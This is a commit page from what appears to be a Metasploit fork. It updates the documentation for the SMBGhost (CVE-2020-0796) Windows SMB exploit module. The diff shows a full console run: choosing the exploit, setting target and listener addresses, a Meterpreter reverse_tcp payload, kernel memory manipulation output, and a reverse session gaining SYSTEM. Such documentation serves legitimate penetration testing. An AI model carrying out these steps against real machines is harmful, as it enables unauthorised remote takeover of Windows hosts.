adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Bump RubySMB and add a simple check method

Browse Source
This commit is contained in:
Spencer McIntyre
2021-04-09 13:59:39 -04:00
parent f9e632231b
commit 63e438e992
4 changed files with 43 additions and 11 deletions
Download Patch File Download Diff File Expand all files Collapse all files
documentation/modules/exploit/windows/smb/cve_2020_0796_smbghost.md
+8 -6
View File
@@ -55,7 +55,7 @@ The exploit is based on [this PoC][2] and [this research][3]. At a high level th
```
msf6 > use exploit/windows/smb/cve_2020_0796_smbghost
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set RHOSTS 192.168.159.76
RHOSTS => 192.168.159.76
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
@@ -65,15 +65,17 @@ LHOST => 192.168.159.128
msf6 exploit(windows/smb/cve_2020_0796_smbghost) > exploit
[*] Started reverse TCP handler on 192.168.159.128:4444
[*] 192.168.159.76:445 - Executing automatic check (disable AutoCheck to override)
[!] 192.168.159.76:445 - The service is running, but could not be validated.
[*] 192.168.159.76:445 - Found low stub at physical address 0x0000000000013000
[*] 192.168.159.76:445 - PML4 at 0x00000000001ad000 (UEFI)
[*] 192.168.159.76:445 - HAL heap found at 0xfffff79dc0000000
[*] 192.168.159.76:445 - Found PML4 self-reference entry at 0x01af
[*] 192.168.159.76:445 - Found hal!HalpInterruptController at 0xfffff79dc0001478
[*] 192.168.159.76:445 - Found hal!HalpApicRequestInterrupt at 0xfffff80216eb7bb0
[*] 192.168.159.76:445 - HAL heap found at 0xfffff7cd80000000
[*] 192.168.159.76:445 - Found PML4 self-reference entry at 0x0122
[*] 192.168.159.76:445 - Found hal!HalpInterruptController at 0xfffff7cd80001478
[*] 192.168.159.76:445 - Found hal!HalpApicRequestInterrupt at 0xfffff8035f6b7bb0
[*] 192.168.159.76:445 - KUSER_SHARED_DATA PTE NX bit cleared!
[*] Sending stage (200262 bytes) to 192.168.159.76
[*] Meterpreter session 5 opened (192.168.159.128:4444 -> 192.168.159.76:49674) at 2021-04-09 12:22:13 -0400
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.76:49675) at 2021-04-09 14:01:43 -0400
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM